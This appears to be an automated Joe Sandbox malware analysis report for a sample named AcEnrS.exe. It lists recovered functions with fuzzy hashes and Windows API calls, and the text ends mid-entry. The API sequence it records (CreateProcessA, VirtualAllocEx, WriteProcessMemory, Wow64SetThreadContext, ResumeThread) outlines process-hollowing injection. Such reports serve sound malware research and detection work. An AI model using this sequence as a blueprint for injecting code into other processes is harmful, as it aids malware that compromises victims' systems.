Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b508a793376a0fdce33341e3bdf1fc0678678987b4bab8847d30991497df430f
Instruction ID: 29b4e8b45055e18d83cbc7d109ba2f489982395b0ecd57f3cabe8d9ff3d3d95f
Opcode Fuzzy Hash: b508a793376a0fdce33341e3bdf1fc0678678987b4bab8847d30991497df430f
Instruction Fuzzy Hash: 33F096313106144BDB265A6ED458B2ABAEEEFC8A59359407DEB0DCB375EE21CC038790

Function 013FEB79 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3555ec7d81cdc69abc2d7842e2c0d9c03d98a31ec3a260b01a03a809301cafbe
Instruction ID: fcbe935e0793fcbf93d921d37cea3f07267b20dae20195ceb7eab8ceb2fe6f91
Opcode Fuzzy Hash: 3555ec7d81cdc69abc2d7842e2c0d9c03d98a31ec3a260b01a03a809301cafbe
Instruction Fuzzy Hash: 8F012978D0020A9FCB41DFA8E944AAEBBB1FB49300F104266D914A3364D7349A56DB91

Function 013F9C23 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dc518b4671da7b5383d804f72e8888c37adb77c947c0f6045496100c2106a19
Instruction ID: 06a932eb322f04739516d37ebf43aff6ab793aba508caf3d2ee38682cd22fa9e
Opcode Fuzzy Hash: 6dc518b4671da7b5383d804f72e8888c37adb77c947c0f6045496100c2106a19
Instruction Fuzzy Hash: E6F090329042589FCB519F69D848BEABFF5EF8D324F0580AAE608C7261D2314955CB51

Function 013F28A1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71852146e247e6a64bdb5458262cb6b202115f15ae8d97327595669b2d1c76ea
Instruction ID: 3c04dcaf4a433a0f0967ae27c24b4124d5b519a7a0a2838f3d43e47d70baf651
Opcode Fuzzy Hash: 71852146e247e6a64bdb5458262cb6b202115f15ae8d97327595669b2d1c76ea
Instruction Fuzzy Hash: 8DE02031E54356CBCB01D7F09C500EEBB34DDD2111708455BC06537150EB34255AC352

Function 013F6739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0849f80e0f0696c8ea3fc6cc0bc1362f8a41786017cd15b40bba462ff066a24d
Instruction ID: d50d5e1f3937603a6bcc6a65d8b7afcf1f5f13d740eefb567ef597712e3ca2de
Opcode Fuzzy Hash: 0849f80e0f0696c8ea3fc6cc0bc1362f8a41786017cd15b40bba462ff066a24d
Instruction Fuzzy Hash: 0FE08C3004835A4FCB0AEF79F8088987F3AFF822047218AE6C0464A06EDF78084AC720

Function 013F28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd0882d4a802af2d5592939cf88596a7d5ee092429af8a88d46b19d918769f4
Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
Opcode Fuzzy Hash: 7dd0882d4a802af2d5592939cf88596a7d5ee092429af8a88d46b19d918769f4
Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1

Function 013F8EF8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: cfa23cea413b358a41966b9362d93f39a8d0671fe9be61638ad67664bac29760
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 6EC08C3360C2282EE239104E7C40EA3BB8DC3C13B8B2102BBFB1CD3200AC429C8401F8

Function 013FAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 906b5f3c72a8f9ef1df05167b858e3bf1461113e633c28245163a4f9e12f0d99
Instruction ID: b08fa0b4b75a4f6ba8a52afb00ce256fb99444ac706ad42c0f0cf619f27b885a
Opcode Fuzzy Hash: 906b5f3c72a8f9ef1df05167b858e3bf1461113e633c28245163a4f9e12f0d99
Instruction Fuzzy Hash: 06D0673AB400189FCB149F98E8408DDFB76FB98221B448116E915A3265C6319925DB50

Function 013F6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91fe8ce58040adde8324fae7b1a5ab05b5fa82c9c429b0663e355e7d2ec25707
Instruction ID: ab01067441ec53b21c36bc25bf722a0ecd06cff30ebb674cbd475f1461213d6f
Opcode Fuzzy Hash: 91fe8ce58040adde8324fae7b1a5ab05b5fa82c9c429b0663e355e7d2ec25707
Instruction Fuzzy Hash: 51C012310443294FC949FF66FD45955372EEB802047508A20940A0656DEF7858498790

Non-executed Functions

Function 013F2A69 Relevance: 5.1, Strings: 4, Instructions: 96COMMON

Download Yara Rule

Strings

Xaq, xrefs: 013F2AD8
Xaq, xrefs: 013F2A9E
Xaq, xrefs: 013F2BA4
Xaq, xrefs: 013F2B57

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq
API String ID: 0-4015495023
Opcode ID: f5a12c3dc9ef6231729db2051856dfba16fd3273345e9c98c4987e01f90edc3b
Instruction ID: ce6d388519e881ac748efe52608aabeb23b443bdee08c24b476d9af9e00cfa5f
Opcode Fuzzy Hash: f5a12c3dc9ef6231729db2051856dfba16fd3273345e9c98c4987e01f90edc3b
Instruction Fuzzy Hash: 5A315E30D0421E8BEF658E6C89817AFBAA6BF84314F1440ADCA15A7395DB30CD85CB92

Function 013F6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;]q, xrefs: 013F692C
\;]q, xrefs: 013F695E
\;]q, xrefs: 013F6936
\;]q, xrefs: 013F6952

Memory Dump Source

Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID: \;]q$\;]q$\;]q$\;]q
API String ID: 0-2351511683
Opcode ID: 841cb1b50b222ef05e637d4f26d3fd8d044cb88126145d158fbd3ac196f47291
Instruction ID: f23c508a1690f33856a387fb8e074db747992d6b4e25ae6a31573486372d8998
Opcode Fuzzy Hash: 841cb1b50b222ef05e637d4f26d3fd8d044cb88126145d158fbd3ac196f47291
Instruction Fuzzy Hash: FA01F2B17401088FD7248E2CC5819A737EAFFC8B68725846EE645CB375DA32DC41C740

Analysis Process: AcEnrS.exePID: 7400, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	10.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	209
Total number of Limit Nodes:	10

Executed Functions

Function 00B4D030 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00B4D0BE
GetCurrentThread.KERNEL32 ref: 00B4D0FB
GetCurrentProcess.KERNEL32 ref: 00B4D138
GetCurrentThreadId.KERNEL32 ref: 00B4D191

Memory Dump Source

Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3e34bd6ab27c53f36956c5a079b8edebed54d85ace7d82d0e8ba5c525c35a097
Instruction ID: 1fee76975366d47f4178a35e1ed93262cfcac6be72fb1b346f821782adac5b1b
Opcode Fuzzy Hash: 3e34bd6ab27c53f36956c5a079b8edebed54d85ace7d82d0e8ba5c525c35a097
Instruction Fuzzy Hash: D75167B09003498FDB54DFA9D588BEEBFF1EF48304F2484A9D409A7361C738A985CB65

Function 00B4D040 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00B4D0BE
GetCurrentThread.KERNEL32 ref: 00B4D0FB
GetCurrentProcess.KERNEL32 ref: 00B4D138
GetCurrentThreadId.KERNEL32 ref: 00B4D191

Memory Dump Source

Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: cd494237be2bcafd28add492a763efd74dc99e144c8a99a626374fea9ab09f72
Instruction ID: 4172e6ca10081b54130dc2d5812ebbf612163f050ddcb58b92b0d77a97316120
Opcode Fuzzy Hash: cd494237be2bcafd28add492a763efd74dc99e144c8a99a626374fea9ab09f72
Instruction Fuzzy Hash: 215165B09003498FDB54EFA9D548BEEBBF1EF48304F208469E409A7360D738A984CB65

Function 0901499D Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09014BDE

Memory Dump Source

Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a207714b4fe4b35542b6050465128917f8424b737be71f7b2efc86b03c4ba9a4
Instruction ID: 3acb1a8c8fc26550da60bcbd945b1eed2c520b8f26a209958363cb1cbe04e4e8
Opcode Fuzzy Hash: a207714b4fe4b35542b6050465128917f8424b737be71f7b2efc86b03c4ba9a4
Instruction Fuzzy Hash: 98913871D00219CFDB64CFA8C8817EDBBF2BF48314F1585AAE819A7260DB749985CF91

Function 090149A8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09014BDE

Memory Dump Source

Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 14a69921f7c2bb041ec974b86d352c3f72e971ffcc2a0c830d09f3ee190fb5db
Instruction ID: 4a628edf84ae0209d6505a99cf414ce97b46fb4da11f5b2f95843a8312d7261b
Opcode Fuzzy Hash: 14a69921f7c2bb041ec974b86d352c3f72e971ffcc2a0c830d09f3ee190fb5db
Instruction Fuzzy Hash: C0914771D00219CFDB64CFA8C881BADBBF2FF48314F1585A9E819A7260DB749985CF91

Function 00B4ADA8 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B4AFFE

Memory Dump Source

Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e071d770c7c6261c374194bdd9fe09fc1903ea67712ab9d94db073d559c68f21
Instruction ID: 68c3c24a172bb0ed014f352e7e6a105f47b917a63921ba40cb70343050d8ae0f
Opcode Fuzzy Hash: e071d770c7c6261c374194bdd9fe09fc1903ea67712ab9d94db073d559c68f21
Instruction Fuzzy Hash: 83716470A00B049FD724DF29D44079ABBF1FF88304F108A6DE49AD7A40DB75EA49CB91

Function 00B45A84 Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 593612cad7a9acc6cf32cdb856d27c4a41ef1485db98c5e51b779f056480510a
Instruction ID: 888580e78af82483822e2b4fd59e60e768180d3343e05a5ee8941a3e38671d34
Opcode Fuzzy Hash: 593612cad7a9acc6cf32cdb856d27c4a41ef1485db98c5e51b779f056480510a
Instruction Fuzzy Hash: 7D31BE71804B49CFDF21CFA8C8857EDBBF0EF56314F14829AC019AB252C775AA4ADB51

Function 00B4590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B459C9

Memory Dump Source

Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a6d3f71069ad5298402a7db83cc2cd5d5a0f8341948f0f3977525d378e8d6347
Instruction ID: 18d6329150a30868673c9666bb4d67b02f4a59cc359c4c382b845282daae45d9
Opcode Fuzzy Hash: a6d3f71069ad5298402a7db83cc2cd5d5a0f8341948f0f3977525d378e8d6347
Instruction Fuzzy Hash: CA41CFB0C00B19CBDB24DFA9C884B9DBBF5BF49304F20816AD418AB255DB75694ACF91

Function 00B444C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B459C9

Memory Dump Source

Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 942bed4c15c2d807af683ca533c76cf2312f11f30b3fbc1d947fcaa774349215
Instruction ID: 8cf60f84f55e4d7615c4ac93f39b0ab7a2757388bd0bf8788df56ce89babd32b
Opcode Fuzzy Hash: 942bed4c15c2d807af683ca533c76cf2312f11f30b3fbc1d947fcaa774349215
Instruction Fuzzy Hash: C641BFB0C00B1DCBDB24DFA9C884B9DBBF5BF49304F20816AD508AB255DB75694ACF91

Function 09014719 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 090147B0

Memory Dump Source

Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: fdd7fcfea8d778e8c4de368a1ef8cb4b937c9675d258d559cd0046f5460a9437
Instruction ID: e4519f5d0b34eca6b359d68f846e620288efdaa9123a0dba1d477ebcbe27513c
Opcode Fuzzy Hash: fdd7fcfea8d778e8c4de368a1ef8cb4b937c9675d258d559cd0046f5460a9437
Instruction Fuzzy Hash: 2B2126B59003498FDF10CFA9C9857EEBBF1FF48310F10882AE959A7250C7789585CBA0

Function 09014720 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 090147B0

Memory Dump Source

Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e7196cd6e5d62671828d72ec029188fd234a4ef92dddfc6cc8d8d2e7d92ca2b2
Instruction ID: 3d74b5acffbb82f401bf933375102da00bb39ef964dd22fa94703ae7d441e065
Opcode Fuzzy Hash: e7196cd6e5d62671828d72ec029188fd234a4ef92dddfc6cc8d8d2e7d92ca2b2
Instruction Fuzzy Hash: 75211B75D003599FDB10DFA9C885BDEBBF5FF48310F108429E519A7250C7789544CBA4

Function 09014808 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09014890

Memory Dump Source

Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 01ab2b43973ecc4b658dab0ac741a7270b1927a99a53b8ed0ec77181c0f8f362
Instruction ID: b91dad6a16cf118011f10018b24583f22147f52c7d3e53b458b34e91f3aa1e9e
Opcode Fuzzy Hash: 01ab2b43973ecc4b658dab0ac741a7270b1927a99a53b8ed0ec77181c0f8f362
Instruction Fuzzy Hash: 1F2139B5C003499FCB10DFA9C981AEEFBF5FF48310F10882AE559A7250C7789545CBA1

Function 09014810 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09014890

Memory Dump Source

Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b5099863ebbf656ff2e090d7ceca0812eee3405f5f7f154129415ba66b1d434c
Instruction ID: 827d809929493f82d86aaaf9500409db7789f3d1ef5bdeb25da212b4bae29392
Opcode Fuzzy Hash: b5099863ebbf656ff2e090d7ceca0812eee3405f5f7f154129415ba66b1d434c
Instruction Fuzzy Hash: D2213AB1C003499FCB10DFAAC884AEEFBF5FF48310F10882AE519A7250C7789544CBA0

Function 09014582 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09014606

Memory Dump Source

Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: dc8e35f8110eb3e09ea48e30da3c47e7cf4f83294ee3d275c3932354256e05cd
Instruction ID: 2ac98451903c51f210c6bd2c67d1dae2eaf3dfd26b8a8ca6e418693f198b7273
Opcode Fuzzy Hash: dc8e35f8110eb3e09ea48e30da3c47e7cf4f83294ee3d275c3932354256e05cd
Instruction Fuzzy Hash: 442154B5D003098FCB10DFAAC4857EEBBF0EF88314F14882AD459A7251CB789985CFA1

Function 09014588 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09014606

Memory Dump Source

Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c3ced05aacc240807413755f46c9d52868f0a0fcec3967757b9591c2e4110114
Instruction ID: 6decb2a82b6ca8e0816de7a321f2c35b9b8cf0cfb39cfda27af1ad0d9d96f962
Opcode Fuzzy Hash: c3ced05aacc240807413755f46c9d52868f0a0fcec3967757b9591c2e4110114
Instruction Fuzzy Hash: AE2135B1D003098FDB10DFAAC4857EEBBF4EF88314F10842AD419A7251CB78A985CFA5

Function 00B4D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B4D717

Memory Dump Source

Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 66bae7282d81db2e34566f380bc16daa1f1dde2c22aa5850208e94cf1d4d5387
Instruction ID: 62a02fd36c30f56a1813069cc3412cb00f3bb0fd7218c822e9709117466b93ae
Opcode Fuzzy Hash: 66bae7282d81db2e34566f380bc16daa1f1dde2c22aa5850208e94cf1d4d5387
Instruction Fuzzy Hash: B121C4B59002489FDB10CF9AD584ADEBBF9FB48310F14845AE918A3350D378A954CFA5

Function 00B4D689 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B4D717

Memory Dump Source

Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1451fffe61e45a8e22ec5d4c5ca6c927b88cd5223a094438923539d2e32b0246
Instruction ID: a86f603c750bde9406b5d87165ce286c87996339093ae4191031f779784780cc
Opcode Fuzzy Hash: 1451fffe61e45a8e22ec5d4c5ca6c927b88cd5223a094438923539d2e32b0246
Instruction Fuzzy Hash: 7521E2B5900248DFDB10CFAAD584AEEBBF5FB48314F14801AE918A7350C378A944CFA4

Function 09014659 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 090146CE

Memory Dump Source

Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c5bbb56beba6bfdde08d12291f78c4aca0409e7bfd550c9eb85731c579684a03
Instruction ID: 901cfcb01fed154b0790c5c489319edf71413e3eda820512c1cdd280f817731f
Opcode Fuzzy Hash: c5bbb56beba6bfdde08d12291f78c4aca0409e7bfd550c9eb85731c579684a03
Instruction Fuzzy Hash: D31156B59002488FCB10DFA9C4456EEBFF5EF48314F20881AE559A7250C739A545CBA0

Function 09014660 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 090146CE

Memory Dump Source

Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2c14fb3d55b13e3f0272dc436910fb1a32aa7456ddcdc0c8015fa8fc466f0a4b
Instruction ID: 8bd39d160433060daa70c1114de1f1ec285cc25dcd214ae0373182d68233e3ea
Opcode Fuzzy Hash: 2c14fb3d55b13e3f0272dc436910fb1a32aa7456ddcdc0c8015fa8fc466f0a4b
Instruction Fuzzy Hash: ED1137759002499FCB10DFAAC844AEEBFF5EF48714F108819E519A7250CB79A544CFA1

Function 090144D3 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0901453A

Memory Dump Source

Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: da221dc63db3a52b1f8b457570b30f1537e9b31f741c8448360a3c917e6f65db
Instruction ID: c06f9f8efde00334805da392e01028a9a809dae8be492bb404736b01b3fcd57f
Opcode Fuzzy Hash: da221dc63db3a52b1f8b457570b30f1537e9b31f741c8448360a3c917e6f65db
Instruction Fuzzy Hash: E51136B5D002488FDB10DFAAC4457EEFBF5EF48314F24881AD519A7250CB38A545CFA4

Function 090144D8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0901453A

Memory Dump Source

Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 00b8fdebae5d073be3128f6c2c74ac0c46c1a5de3d36e3401c02ac56a01f7ce0
Instruction ID: e3019397634dd3e1fbaf44b15a58cfad5a75a7497e83a700c7281bf72032bb03
Opcode Fuzzy Hash: 00b8fdebae5d073be3128f6c2c74ac0c46c1a5de3d36e3401c02ac56a01f7ce0
Instruction Fuzzy Hash: 341125B1D002488BCB20DFAAC4457EEFBF5EF88724F208819D519A7250CB79A945CBA4

Function 00B4AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B4AFFE

Memory Dump Source

Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f03bcb38c39726266abf78a33cfd26307564f7832bbd4590a0b8470c54b28f19
Instruction ID: 3f65d356be77d5921bd29f220d3b41e9117aadc77b7ec589b11ea7ab9eb281dc
Opcode Fuzzy Hash: f03bcb38c39726266abf78a33cfd26307564f7832bbd4590a0b8470c54b28f19
Instruction Fuzzy Hash: F31110B6C003498FCB10CF9AC444ADEFBF4EF88314F10846AD928A7610C379A645CFA1

Function 090157A4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 09017F3D

Memory Dump Source

Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

